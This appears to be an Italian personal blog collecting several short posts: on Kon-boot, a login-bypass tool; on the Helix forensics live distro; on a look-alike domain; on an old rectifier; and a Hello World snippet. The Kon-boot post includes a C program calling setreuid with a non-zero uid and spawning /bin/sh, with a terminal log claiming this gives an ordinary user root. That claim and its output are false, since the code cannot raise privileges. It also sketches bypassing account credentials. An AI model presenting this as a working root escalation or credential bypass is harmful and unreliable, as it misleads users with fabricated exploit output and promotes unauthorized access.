Leggendo una rivista, ieri sera, mi sono imbattuto in questa “utility forense” che promette miracoli nel caso si siano dimenticate le credenziali per accedere al sistema.

Mi direte, “Bello sforzo, ne esistono già di tool del genere per recuperare la password!…”

Kon-boot fa di più, con pochi bytes in assembler (TASM 4.0) è in grado di modificare una parte del kernel (Linux o Wnz) permettendo di accerere ai vari account senza avere le credenziali.  Per Linux occorre inserire al login lo uid kon-usr e in caso si voglia ripristinare il tutto, accedere con kon-fix. Con UNetbootin è possibile creare anche la versione “Live” su chiavetta USB.

Altra possibilità è quella di ottenere i diritti di root dalla linea di comando:

arifan@enterprise:~$ cat exec.c
#include <stdio.h>

#define UBUNTU_CODE	1911
#define FEDORA_CODE	777

int main( void )
{
       setreuid(UBUNTU_CODE, UBUNTU_CODE);
       system("/bin/sh");
}

arifan@enterprise:~$ gcc -o exec exec.c
arifan@enterprise:~$ id
uid=1001(arifan) gid=1001(arifan) groups=1001(arifan)
arifan@enterprise:~$ ./exec
# id
uid=0(root) gid=0(root) groups=1001(arifan)
# whoami
root

Date un’occhiata qui!

Link & Thanks to author

A breve si ricomincia….

Oggi, “sfogliando” pagine di notizie, mi si è presentato quello che da sempre è stato il “paradosso”. Mi sono sforzato di vedere qualche pensiero che non portasse inesorabilmente ad un tornaconto meramente economico.

Date un’occhiata:

Link verso motore di ricerca ed articoli correlati

Fatemi sapere che ne pensate…

arifan

Che dire, spesso e volentieri si lasciano tracce, impronte quasi indelebili, ad ogno nostro passaggio. Che siano bilogiche, fisiche o dei semplici domini di stato in una porta nand di una pennetta USB poco importa. Oggi ci ritroviamo spesso a portare con noi volumi di informazioni sensibili, fino a poco tempo fa impensabili. Basti pensare alla rubrica del cellulare, il lettore MP3, la pennetta USB etc. Senza volerlo, lasciamo in ogni momento, traccia del nostro passaggio, soprattutto se leggiamo questa debolezza in ambito elettronico informatico. Notizia fresca fresca di questi giorni è l’arresto di alcuni presunti malviventi proprio per le tracce dei loro atti e progetti su delle chiavette USB.

Viaggiando molto, mi sono spesso chiesto che ne sarebbe stato dei dati sensibili che porto con me, se fossero finiti nelle mani di malintenzionati o peggio della “concorrenza aziendale”. Ho creduto bene quindi, di cercare informazioni e tentare di proteggere o rendere difficoltosa l’utilizzo non autorizzato delle risorse e delle informazionoi ad esse legate. La ricerca mi ha portato a temere il peggio. COme fare a scoprire in che modo si possono reperire informazioni dal mio sistema? Semplicemente mettendolo alla prova. Scovando strumenti e quant’altro che mi permettesse di “lavorare” su di un sistema che dovevo proteggere. Fondamentale, quando si cercano informazioni è evitare ogni forma di contaminazione al sistema ospite. Come fare: una distro live con i toolkit del caso! Come? Ebbene si, i migliori software sono su base Linux,e il miglior modo di interagire senza  un sistema è usare un sistema operativo live, e cioè che non impegna il disco rigido o la macchina ospite. Per recuperare le informazioni di una macchina ho iniziato a giocare con una distro ideale per lo scopo: Helix.

Helix è una distribuzione basata sulla famosa e versatile Knoppix, arricchita e persoalizzata allo scopo.http://www.e-fense.com/helix3-download.php Insieme al corredo solito delle applicazioni base, troviamo un sacco di utility e di tool per il recupero di informazioni e dati. (Incident Response / Forensics Tools, Network Utilities, Servers, Packet Sniffers and Assemblers, Vulnerability Assessment, Wireless tools) In questi giorni ho iniziato a “giocarci” un po’ per capire le potenzialità e fino a quanto si può scoprire e racimolare da un sistema. Non mancherò di tenervi informati sulle mie impressioni e quant’altro scopra della Helix….

Yep.

A volte mi chiedo come possa essere possibile continuare senza prendersi uno straccio di vacanza! Tra guasti, malfunzionamenti e righe di codice impossibile, si viene quasi catapultati in una sorta di limbo. Si arriva a fare dei semplici errori che se non corretti e ripresi in tempo, possono creare caos e conseguenze inimmaginabili. Ad esempio cito l’esperienza di oggi: un sito è stato aperto con il dominio talmente simile che ho subito chiamato sia l’azienda fornitrice del servizio, sia il malcapitato! Ovvia la valanga di scuse…

Ma la somiglianza del dominio è impressionante! Basta che cercate il mio dominio in un qualsiasi motore e PUFF! appare un domini simile. Facile sbagliarsi…soprattuto se bisognosi di ferie.

arifan in corto…ovvero flaospe a più non possso.

Viaggiando nella rete alla ricerca di idee, ho trovato un “caricabatterie” dei tempi andati (1970 o giù di li modello Edison-Swan Electric 68506).

In pratica si tratta di un diodo nel vero senso del termine, da avvitare in un portalampade E27 per ricavarne della corrente continua “sporca”. Il raddrizzatore” a gas”  fornisce una tensione continua pulsante in quanto “raddrizza” una sola semionda.

Sotto il componente nella versione a semiconduttore (1n4008) ;-P

In pratica è la versione “casalinga” dei ben più prestanti “Raddrizzatori a Vapori di Mercurio”. (ovviamente non c’entra nulla la divinità greca e gli effetti collaterali dei relativi fumi da alcool post-sbronza)

Nella fotografia un raddrizzatore a vapori di mercurio di un vecchio stadio di alimentazione di un ascensore.

Bizzarro ma funzionale…

THNX

------------------------------------------------------------------
/**
 *"Hello World!"
 */
class HelloWorldApp {
    public static void main(String[] args) {
        System.out.println("Hello World!");
    }
}
------------------------------------------------------------------

Hello world!
Finalmente, dopo un interminabile periodo di gestazione, mi sono deciso a scrollarmi di dosso quel velo di pigrizia.

Eccomi al lavoro!
Yep!